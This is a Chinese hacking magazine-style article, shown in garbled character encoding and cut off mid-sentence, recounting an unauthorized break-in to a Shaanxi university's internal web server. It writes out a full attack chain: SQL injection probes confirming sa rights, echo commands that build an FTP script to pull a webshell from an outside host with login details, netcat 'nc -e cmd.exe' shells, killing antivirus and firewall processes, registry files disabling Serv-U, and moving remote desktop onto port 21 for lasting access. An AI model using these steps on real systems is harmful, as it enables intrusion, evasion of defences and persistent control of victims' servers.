最近黑防上面有很多如何入侵高校網(wǎng)站的文章，大都是進(jìn)行的注入攻擊，

偷天換日之入侵陜西某高校內(nèi)部網(wǎng)

。呵呵，為了迎合大眾所趨，我也進(jìn)入一些高校網(wǎng)站玩了玩。這不，這次就發(fā)現(xiàn)了一個(gè)陜西高校里面一個(gè)網(wǎng)站的注入漏洞，不過獲取最高權(quán)限還真費(fèi)了一翻勁。

    第一步：發(fā)現(xiàn)注入漏洞

    在它的一個(gè)新聞顯示頁面的聯(lián)接上加一個(gè)"'"，呵呵，可以注入！看看是什么權(quán)限的，在后面在加一個(gè) and user>0

    顯示有dbo的字樣，暈，竟然可以擁有SA的權(quán)限，唉，真不知道管理員是怎么搞的！

    先不管這些，拿出明小子的domain,現(xiàn)在的版本到了3.5了（和其他注入工具相比，domain用起來還是比較順手的，不過命令回顯有點(diǎn)糟糕)。

    既然發(fā)現(xiàn)了注入點(diǎn)，那么開始干活吧！

    第二步：上傳文件

    既然現(xiàn)在有了sa的權(quán)限，那么就可以執(zhí)行管理員權(quán)限的命令了。不過因?yàn)橐话愎ぞ叩幕仫@都很糟糕（至少我用NBSI,domain等都有這樣的問題），所以還是先搞個(gè)WebShell上去再說吧。首先需要找到web根目錄，不然WebShell放哪啊？！在domain的命令行下多dir幾次就可以找到了，根據(jù)一般人的習(xí)慣，根目錄不會(huì)太深，取的文件名和網(wǎng)站多少有點(diǎn)關(guān)系。估計(jì)沒有幾個(gè)管理員會(huì)把根目錄名取得很怪異并且放在層次很深的地方（這是管理員都有的通病，怕麻煩，圖方便，可是方便了自己也方便了我們，嘿嘿）。很快就可以找到根目錄為 d:/ccs。

    那么就上傳WebShell 吧！可是這幾個(gè)注入工具的上傳功能都有點(diǎn)問題，要么傳小文件沒問題，傳大了就不行了！要么根本沒傳上去了，現(xiàn)成的工具沒法上傳了，咋辦？不怕不怕，總不能在一棵樹上吊死吧！用ftp下載！在domain的命令行下依次輸入下列語句：

    echo open showff.51.net>>c:\ftp

    echo showff>>c:\ftp

    echo 123456>>c:\ftp

    echo cd public_html>>c:\ftp

    echo get WebShell.asp d:\ccs\index_admin.asp>>c:\ftp

    echo bye>>c:\ftp

    當(dāng)然首先你要有一個(gè)FTP的空間，我用的虎翼的FTP，速度很快。這樣在服務(wù)器c盤上就生成了一個(gè)名為ftp的文件內(nèi)容就是剛輸入的東東。命令行下輸入ftp -s:c:\ftp,點(diǎn)擊執(zhí)行，這樣一個(gè) WebShell就下載到我們可愛的肉雞上了。瀏覽器輸入地址查看進(jìn)入我們的WebShell 里面去，我們下載的海洋2006，功能強(qiáng)大，好用.

    到現(xiàn)在為止，如果只是想活動(dòng)WebShell的話似乎就夠了，海陽的WebShell可以干很多事情了。但是我們的目標(biāo)是進(jìn)一步獲取更大的權(quán)限。

    第三步：偷天換日更換服務(wù)

    用WebShell上傳一個(gè)nc，然后在domain的命令行里面執(zhí)行 nc-e cmd.exe –l –p 43958,在自己的電腦上執(zhí)行telnet xxx.xxx.edu.cn 43958

    沒有任何反應(yīng)，顯示為”不能連接到主機(jī)”這樣的字樣。很好，很正常，服務(wù)器里面沒有殺毒軟件和防火墻軟件才怪了，

電腦資料

《偷天換日之入侵陜西某高校內(nèi)部網(wǎng)》(http://www.msguai.com)。為了進(jìn)一步證實(shí)這點(diǎn)，在domain里面執(zhí)行netstat –a,根據(jù)返回結(jié)果我又telnet了幾個(gè)打開的端口.

    其中80端口和21端口開了，都可以訪問到，其他的端口根本沒法使用！

    那么就用pslist和pskill把相關(guān)的殺毒軟件和防火墻關(guān)了唄！呵呵，當(dāng)然我也這么做了，但事實(shí)上沒那么簡單。這臺(tái)服務(wù)器上雖然有瑞星防火墻，但是關(guān)了之后當(dāng)我再次telnet遠(yuǎn)處的nc時(shí)根本沒有反應(yīng)，這是為什么呢？(沉思了幾秒)呵呵，其實(shí)很簡單的，因?yàn)檫@是一個(gè)學(xué)校的里面的內(nèi)部網(wǎng)站，八成在這臺(tái)服務(wù)器的周圍存在著其他類型的防火墻或者網(wǎng)關(guān)之類的東西，只允許外部訪問這臺(tái)服務(wù)器的80和21端口。

    可是80和21端口都被占用了，難道我們就沒法使用我們自己的木馬或者獲取3389遠(yuǎn)程控制權(quán)嗎？非也！看我來施展偷天換日大法！

    首先我們要意識到80端口必須存在不然很快就會(huì)被發(fā)現(xiàn)被黑，那么只能拿21端口下手了。一般只是管理員使用文件上傳而已，暫時(shí)可以不被發(fā)現(xiàn)的。用net start命令查看發(fā)現(xiàn)對方使用的Serv-U的FTP服務(wù)器。

    Step one：設(shè)法使Serv-U服務(wù)禁止，這樣它就不能開機(jī)自動(dòng)運(yùn)行而占用21端口了。方法如下：編輯一個(gè)reg文件，內(nèi)容如下：

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]

    "Start"=dword:00000004

    注意REGEDIT4下面要有一空行。Start為2是自動(dòng)，3是手動(dòng)，4是禁止。這和服務(wù)里面的設(shè)置是一一對應(yīng)的。保存為a.reg文件，用WebShell上傳至服務(wù)器的d:/ccs/index/a.reg，使用domain運(yùn)行 regedit /s d:/ccs/index/a.reg 這樣Serv-U服務(wù)就被禁止了。隨后用在domain里面使用命令net stop serv-u將現(xiàn)有的ftp進(jìn)程關(guān)掉。

    Step two：修改Terminal遠(yuǎn)程登錄的端口號。原本是3389的，現(xiàn)在要改為21�？梢跃庉嬜�冊表修改，也可以直接運(yùn)行3389端口修改器類似這樣的程序。我使用x3389程序修改。直接上傳至服務(wù)器，在domain里面執(zhí)行x3389.exe 21即可。隨后設(shè)法開啟3389服務(wù)，網(wǎng)上有很多這樣的方法，這里不說了。如果想使Terminal服務(wù)總是開機(jī)自動(dòng)運(yùn)行，還需要編輯一reg文件內(nèi)容如下：

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

    "Start"=dword:00000002

    保存為b.reg，上傳服務(wù)器并運(yùn)行regedit /s d:/ccs/index/b.reg。如果嫌開Terminal服務(wù)麻煩，干脆直接傳個(gè)Radmin或者其他什么遠(yuǎn)程控制軟件設(shè)置端口為21不就得了嗎？

    Step three：重啟服務(wù)器。上傳個(gè)reboot工具，執(zhí)行重啟。這是為了Terminal服務(wù)需要的。如果使用其他木馬可以不考慮重啟。

    重啟后，在用domain運(yùn)行net start ,發(fā)現(xiàn)Serv-U不見了，呵呵！那么，現(xiàn)在就可以大搖大擺的進(jìn)入服務(wù)器了！這里我隨便上傳了一個(gè)nc試試效果，執(zhí)行命令為nc –e cmd.exe –l –p 21，然后在本地執(zhí)行telnet xxx.xxx.edu.cn 21，返回結(jié)果。

    總結(jié)：

    其實(shí)，只要把原有的FTP禁掉，空出21端口來，那其他的事情也就好做了。主要是開始如何察覺到它的周圍防火墻的情況以及允許通過的端口。了解了這些，服務(wù)器還不是任我們魚肉嗎？當(dāng)然，為了保證肉雞的長久性，穩(wěn)定性和不被發(fā)現(xiàn)性，最好使用隧道技術(shù)通過